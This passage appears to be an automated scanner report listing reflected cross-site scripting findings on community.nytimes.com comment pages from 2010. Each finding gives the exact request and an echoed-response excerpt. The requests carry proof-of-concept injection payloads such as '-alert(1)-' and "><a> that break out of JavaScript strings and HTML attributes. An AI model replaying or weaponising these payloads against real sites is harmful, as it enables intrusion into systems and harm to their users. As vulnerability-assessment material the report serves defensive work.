       NYTD.CRNR = window.NYTD.CRNR || {};
NYTD.CRNR.pageType = 'commentsefe6c'-alert(1)-'1c749a99567';
       NYTD.CRNR.commentElement = 'submitComments';
       NYTD.CRNR.bozoElement = 'bozo';
       NYTD.CRNR.ratingToggle = false;
       NYTD.CRNR.formToggle = true;
       NYTD.CRNR.pageVertical = 'blogs';
   </sc
...[SNIP]...

3.79. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/11/grants-awarded-for-preservation-of-new-york-sites/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://community.nytimes.com
Path:	/comments/artsbeat.blogs.nytimes.com/2010/11/11/grants-awarded-for-preservation-of-new-york-sites/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1d48e"><a>b2e8a2c3648 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /comments/artsbeat.blogs.nytimes.com1d48e"><a>b2e8a2c3648/2010/11/11/grants-awarded-for-preservation-of-new-york-sites/ HTTP/1.1
Host: community.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.59
Date: Sat, 13 Nov 2010 02:01:37 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.9
Content-Length: 34100

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Grants
...[SNIP]...
<script type="text/javascript" language="JavaScript" src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=community.nytimes.com/comments/artsbeat.blogs.nytimes.com1d48e"><a>b2e8a2c3648/yr/mo/day/grants-awarded-for-preservation-of-new-york-sites/&posall=Frame4A,MiddleRight,Box1,Box3,Middle5,PostCommentA,TopAd,Bar1,ADX_CLIENTSIDE,crnr_assetpromo1,crnr_assetpromo2,SponLink,Top5,Bottom7
...[SNIP]...

3.80. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/11/grants-awarded-for-preservation-of-new-york-sites/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://community.nytimes.com
Path:	/comments/artsbeat.blogs.nytimes.com/2010/11/11/grants-awarded-for-preservation-of-new-york-sites/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d01a6"-alert(1)-"452e5e6ff60 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /comments/artsbeat.blogs.nytimes.com/2010/11/11/grants-awarded-for-preservation-of-new-york-sites/?d01a6"-alert(1)-"452e5e6ff60=1 HTTP/1.1
Host: community.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.59
Date: Sat, 13 Nov 2010 02:01:25 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.9
Content-Length: 70935

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Grants
...[SNIP]...
al,nytartsbeat";
var dcsvid = "";
var regstatus = "non-registered";
var s_prop1 = "comments";
var s_prop5 = "63_142527";
var s_pagename = "2010/11/11/grants-awarded-for-preservation-of-new-york-sites/?d01a6"-alert(1)-"452e5e6ff60=1";
var s_channel = "artsbeat";
Tacoda_AMS_DDC_addPair( "t_site","nytimes.com" );
Tacoda_AMS_DDC_addPair( "t_section","" );
</script>
...[SNIP]...

3.81. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/11/met-says-levine-is-much-better-after-illness-forces-withdrawal/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://community.nytimes.com
Path:	/comments/artsbeat.blogs.nytimes.com/2010/11/11/met-says-levine-is-much-better-after-illness-forces-withdrawal/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 197c4'-alert(1)-'5a4facb62fc was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /comments197c4'-alert(1)-'5a4facb62fc/artsbeat.blogs.nytimes.com/2010/11/11/met-says-levine-is-much-better-after-illness-forces-withdrawal/ HTTP/1.1
Host: community.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.59
Date: Sat, 13 Nov 2010 02:01:51 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.9
Content-Length: 82577

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Met Say
...[SNIP]...
<script type="text/javascript" language="Javascript">
       //Variables defined for the Overflow page
       NYTD.CRNR = window.NYTD.CRNR || {};
NYTD.CRNR.pageType = 'comments197c4'-alert(1)-'5a4facb62fc';
       NYTD.CRNR.commentElement = 'submitComments';
       NYTD.CRNR.bozoElement = 'bozo';
       NYTD.CRNR.ratingToggle = false;
       NYTD.CRNR.formToggle = true;
       NYTD.CRNR.pageVertical = 'blogs';
   </sc
...[SNIP]...

3.82. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/11/met-says-levine-is-much-better-after-illness-forces-withdrawal/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://community.nytimes.com
Path:	/comments/artsbeat.blogs.nytimes.com/2010/11/11/met-says-levine-is-much-better-after-illness-forces-withdrawal/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 70326"><a>8e7c289c36b was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /comments70326"><a>8e7c289c36b/artsbeat.blogs.nytimes.com/2010/11/11/met-says-levine-is-much-better-after-illness-forces-withdrawal/ HTTP/1.1
Host: community.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.59
Date: Sat, 13 Nov 2010 02:01:35 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.9
Content-Length: 82559

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Met Say
...[SNIP]...
<script type="text/javascript" language="JavaScript" src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=community.nytimes.com/comments70326"><a>8e7c289c36b/artsbeat.blogs.nytimes.com/yr/mo/day/met-says-levine-is-much-better-after-illness-forces-withdrawal/&posall=Frame4A,MiddleRight,Box1,Box3,Middle5,PostCommentA,TopAd,Bar1,ADX_CLIENTSIDE,crnr_assetpromo
...[SNIP]...

3.83. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/11/met-says-levine-is-much-better-after-illness-forces-withdrawal/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://community.nytimes.com
Path:	/comments/artsbeat.blogs.nytimes.com/2010/11/11/met-says-levine-is-much-better-after-illness-forces-withdrawal/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 32dbf"><a>d7df2b346ed was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /comments/artsbeat.blogs.nytimes.com32dbf"><a>d7df2b346ed/2010/11/11/met-says-levine-is-much-better-after-illness-forces-withdrawal/ HTTP/1.1
Host: community.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.59
Date: Sat, 13 Nov 2010 02:01:52 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.9
Content-Length: 34488

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Met Say
...[SNIP]...
<script type="text/javascript" language="JavaScript" src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=community.nytimes.com/comments/artsbeat.blogs.nytimes.com32dbf"><a>d7df2b346ed/yr/mo/day/met-says-levine-is-much-better-after-illness-forces-withdrawal/&posall=Frame4A,MiddleRight,Box1,Box3,Middle5,PostCommentA,TopAd,Bar1,ADX_CLIENTSIDE,crnr_assetpromo1,crnr_assetpromo2,SponLink
...[SNIP]...

3.84. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/11/met-says-levine-is-much-better-after-illness-forces-withdrawal/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://community.nytimes.com
Path:	/comments/artsbeat.blogs.nytimes.com/2010/11/11/met-says-levine-is-much-better-after-illness-forces-withdrawal/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 64c7c"-alert(1)-"629b7b315c2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /comments/artsbeat.blogs.nytimes.com/2010/11/11/met-says-levine-is-much-better-after-illness-forces-withdrawal/?64c7c"-alert(1)-"629b7b315c2=1 HTTP/1.1
Host: community.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.59
Date: Sat, 13 Nov 2010 02:01:32 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.9
Content-Length: 80298

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Met Say
...[SNIP]...
t";
var dcsvid = "";
var regstatus = "non-registered";
var s_prop1 = "comments";
var s_prop5 = "63_142517";
var s_pagename = "2010/11/11/met-says-levine-is-much-better-after-illness-forces-withdrawal/?64c7c"-alert(1)-"629b7b315c2=1";
var s_channel = "artsbeat";
Tacoda_AMS_DDC_addPair( "t_site","nytimes.com" );
Tacoda_AMS_DDC_addPair( "t_section","" );
</script>
...[SNIP]...

3.85. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/11/play-about-martin-luther-king-now-aiming-for-broadway-next-fall/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://community.nytimes.com
Path:	/comments/artsbeat.blogs.nytimes.com/2010/11/11/play-about-martin-luther-king-now-aiming-for-broadway-next-fall/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 95f3f'-alert(1)-'ada34236929 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /comments95f3f'-alert(1)-'ada34236929/artsbeat.blogs.nytimes.com/2010/11/11/play-about-martin-luther-king-now-aiming-for-broadway-next-fall/ HTTP/1.1
Host: community.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.59
Date: Sat, 13 Nov 2010 02:01:45 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.9
Content-Length: 71869

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Play Ab
...[SNIP]...
<script type="text/javascript" language="Javascript">
       //Variables defined for the Overflow page
       NYTD.CRNR = window.NYTD.CRNR || {};
NYTD.CRNR.pageType = 'comments95f3f'-alert(1)-'ada34236929';
       NYTD.CRNR.commentElement = 'submitComments';
       NYTD.CRNR.bozoElement = 'bozo';
       NYTD.CRNR.ratingToggle = false;
       NYTD.CRNR.formToggle = true;
       NYTD.CRNR.pageVertical = 'blogs';
   </sc
...[SNIP]...

3.86. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/11/play-about-martin-luther-king-now-aiming-for-broadway-next-fall/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://community.nytimes.com
Path:	/comments/artsbeat.blogs.nytimes.com/2010/11/11/play-about-martin-luther-king-now-aiming-for-broadway-next-fall/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e9161"><a>5ab015563d1 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /commentse9161"><a>5ab015563d1/artsbeat.blogs.nytimes.com/2010/11/11/play-about-martin-luther-king-now-aiming-for-broadway-next-fall/ HTTP/1.1
Host: community.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.59
Date: Sat, 13 Nov 2010 02:01:34 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.9
Content-Length: 71781

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Play Ab
...[SNIP]...
<script type="text/javascript" language="JavaScript" src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=community.nytimes.com/commentse9161"><a>5ab015563d1/artsbeat.blogs.nytimes.com/yr/mo/day/play-about-martin-luther-king-now-aiming-for-broadway-next-fall/&posall=Frame4A,MiddleRight,Box1,Box3,Middle5,PostCommentA,TopAd,Bar1,ADX_CLIENTSIDE,crnr_assetprom
...[SNIP]...

3.87. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/11/play-about-martin-luther-king-now-aiming-for-broadway-next-fall/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://community.nytimes.com
Path:	/comments/artsbeat.blogs.nytimes.com/2010/11/11/play-about-martin-luther-king-now-aiming-for-broadway-next-fall/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b71c9"><a>1e34a4fd54a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /comments/artsbeat.blogs.nytimes.comb71c9"><a>1e34a4fd54a/2010/11/11/play-about-martin-luther-king-now-aiming-for-broadway-next-fall/ HTTP/1.1
Host: community.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.59
Date: Sat, 13 Nov 2010 02:01:46 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.9
Content-Length: 34447

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Play Ab
...[SNIP]...
<script type="text/javascript" language="JavaScript" src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=community.nytimes.com/comments/artsbeat.blogs.nytimes.comb71c9"><a>1e34a4fd54a/yr/mo/day/play-about-martin-luther-king-now-aiming-for-broadway-next-fall/&posall=Frame4A,MiddleRight,Box1,Box3,Middle5,PostCommentA,TopAd,Bar1,ADX_CLIENTSIDE,crnr_assetpromo1,crnr_assetpromo2,SponLin
...[SNIP]...

3.88. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/11/play-about-martin-luther-king-now-aiming-for-broadway-next-fall/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://community.nytimes.com
Path:	/comments/artsbeat.blogs.nytimes.com/2010/11/11/play-about-martin-luther-king-now-aiming-for-broadway-next-fall/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6bca7"-alert(1)-"2319875f975 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /comments/artsbeat.blogs.nytimes.com/2010/11/11/play-about-martin-luther-king-now-aiming-for-broadway-next-fall/?6bca7"-alert(1)-"2319875f975=1 HTTP/1.1
Host: community.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.59
Date: Sat, 13 Nov 2010 02:01:31 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.9
Content-Length: 71297

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Play Ab
...[SNIP]...
";
var dcsvid = "";
var regstatus = "non-registered";
var s_prop1 = "comments";
var s_prop5 = "63_142601";
var s_pagename = "2010/11/11/play-about-martin-luther-king-now-aiming-for-broadway-next-fall/?6bca7"-alert(1)-"2319875f975=1";
var s_channel = "artsbeat";
Tacoda_AMS_DDC_addPair( "t_site","nytimes.com" );
Tacoda_AMS_DDC_addPair( "t_section","" );
</script>
...[SNIP]...

3.89. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/11/spider-man-musical-teams-with-syfy-channel/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://community.nytimes.com
Path:	/comments/artsbeat.blogs.nytimes.com/2010/11/11/spider-man-musical-teams-with-syfy-channel/

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 51860"><a>6eafaae01f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /comments51860"><a>6eafaae01f/artsbeat.blogs.nytimes.com/2010/11/11/spider-man-musical-teams-with-syfy-channel/ HTTP/1.1
Host: community.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.59
Date: Sat, 13 Nov 2010 02:01:37 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.9
Content-Length: 84159

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>'Spider
...[SNIP]...
<script type="text/javascript" language="JavaScript" src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=community.nytimes.com/comments51860"><a>6eafaae01f/artsbeat.blogs.nytimes.com/yr/mo/day/spider-man-musical-teams-with-syfy-channel/&posall=Frame4A,MiddleRight,Box1,Box3,Middle5,PostCommentA,TopAd,Bar1,ADX_CLIENTSIDE,crnr_assetpromo1,crnr_assetpromo2,S
...[SNIP]...

3.90. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/11/spider-man-musical-teams-with-syfy-channel/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://community.nytimes.com
Path:	/comments/artsbeat.blogs.nytimes.com/2010/11/11/spider-man-musical-teams-with-syfy-channel/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1bc00'-alert(1)-'307dd572ea0 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /comments1bc00'-alert(1)-'307dd572ea0/artsbeat.blogs.nytimes.com/2010/11/11/spider-man-musical-teams-with-syfy-channel/ HTTP/1.1
Host: community.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.59
Date: Sat, 13 Nov 2010 02:01:51 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.9
Content-Length: 84201

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>'Spider
...[SNIP]...
<script type="text/javascript" language="Javascript">
       //Variables defined for the Overflow page
       NYTD.CRNR = window.NYTD.CRNR || {};
NYTD.CRNR.pageType = 'comments1bc00'-alert(1)-'307dd572ea0';
       NYTD.CRNR.commentElement = 'submitComments';
       NYTD.CRNR.bozoElement = 'bozo';
       NYTD.CRNR.ratingToggle = false;
       NYTD.CRNR.formToggle = true;
       NYTD.CRNR.pageVertical = 'blogs';
   </sc
...[SNIP]...

3.91. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/11/spider-man-musical-teams-with-syfy-channel/ [REST URL parameter 2] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://community.nytimes.com
Path:	/comments/artsbeat.blogs.nytimes.com/2010/11/11/spider-man-musical-teams-with-syfy-channel/

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c5a8f"><a>014e8107919 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /comments/artsbeat.blogs.nytimes.comc5a8f"><a>014e8107919/2010/11/11/spider-man-musical-teams-with-syfy-channel/ HTTP/1.1
Host: community.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.59
Date: Sat, 13 Nov 2010 02:01:52 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.9
Content-Length: 33806

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>'Spider
...[SNIP]...
<script type="text/javascript" language="JavaScript" src="http://www.nytimes.com/adx/bin/adx_remote.html?type=fastscript&page=community.nytimes.com/comments/artsbeat.blogs.nytimes.comc5a8f"><a>014e8107919/yr/mo/day/spider-man-musical-teams-with-syfy-channel/&posall=Frame4A,MiddleRight,Box1,Box3,Middle5,PostCommentA,TopAd,Bar1,ADX_CLIENTSIDE,crnr_assetpromo1,crnr_assetpromo2,SponLink,Top5,Bottom7,Bottom
...[SNIP]...

3.92. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/11/spider-man-musical-teams-with-syfy-channel/ [name of an arbitrarily supplied request parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://community.nytimes.com
Path:	/comments/artsbeat.blogs.nytimes.com/2010/11/11/spider-man-musical-teams-with-syfy-channel/

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f46b3"-alert(1)-"68d72677370 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /comments/artsbeat.blogs.nytimes.com/2010/11/11/spider-man-musical-teams-with-syfy-channel/?f46b3"-alert(1)-"68d72677370=1 HTTP/1.1
Host: community.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.59
Date: Sat, 13 Nov 2010 02:01:34 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.9
Content-Length: 81567

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>'Spider
...[SNIP]...
mesglobal,nytartsbeat";
var dcsvid = "";
var regstatus = "non-registered";
var s_prop1 = "comments";
var s_prop5 = "63_142483";
var s_pagename = "2010/11/11/spider-man-musical-teams-with-syfy-channel/?f46b3"-alert(1)-"68d72677370=1";
var s_channel = "artsbeat";
Tacoda_AMS_DDC_addPair( "t_site","nytimes.com" );
Tacoda_AMS_DDC_addPair( "t_section","" );
</script>
...[SNIP]...

3.93. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/11/tangled-web-of-rubicon-unravels-at-amc/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://community.nytimes.com
Path:	/comments/artsbeat.blogs.nytimes.com/2010/11/11/tangled-web-of-rubicon-unravels-at-amc/

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4241c'-alert(1)-'33ecf65d4eb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /comments4241c'-alert(1)-'33ecf65d4eb/artsbeat.blogs.nytimes.com/2010/11/11/tangled-web-of-rubicon-unravels-at-amc/ HTTP/1.1
Host: community.nytimes.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx/0.7.59
Date: Sat, 13 Nov 2010 02:01:53 GMT
Content-Type: text/html; charset=UTF-8
Connection: close
X-Powered-By: PHP/5.2.9
Content-Length: 120080

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">
<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Tangled
...[SNIP]...
<script type="text/javascript" language="Javascript">
       //Variables defined for the Overflow page
       NYTD.CRNR = window.NYTD.CRNR || {};
NYTD.CRNR.pageType = 'comments4241c'-alert(1)-'33ecf65d4eb';
       NYTD.CRNR.commentElement = 'submitComments';
       NYTD.CRNR.bozoElement = 'bozo';
       NYTD.CRNR.ratingToggle = false;
       NYTD.CRNR.formToggle = true;
       NYTD.CRNR.pageVertical = 'blogs';
   </sc
...[SNIP]...

3.94. http://community.nytimes.com/comments/artsbeat.blogs.nytimes.com/2010/11/11/tangled-web-of-rubicon-unravels-at-amc/ [REST URL parameter 1] previous next

Summary

Severity:	High
Confidence:	Firm
Host:	http://community.nytimes.com
Path:	/comments/artsbeat.blogs.nytimes.com/2010/11/11/tangled-web-of-rubicon-unravels-at-amc/

Issue detail

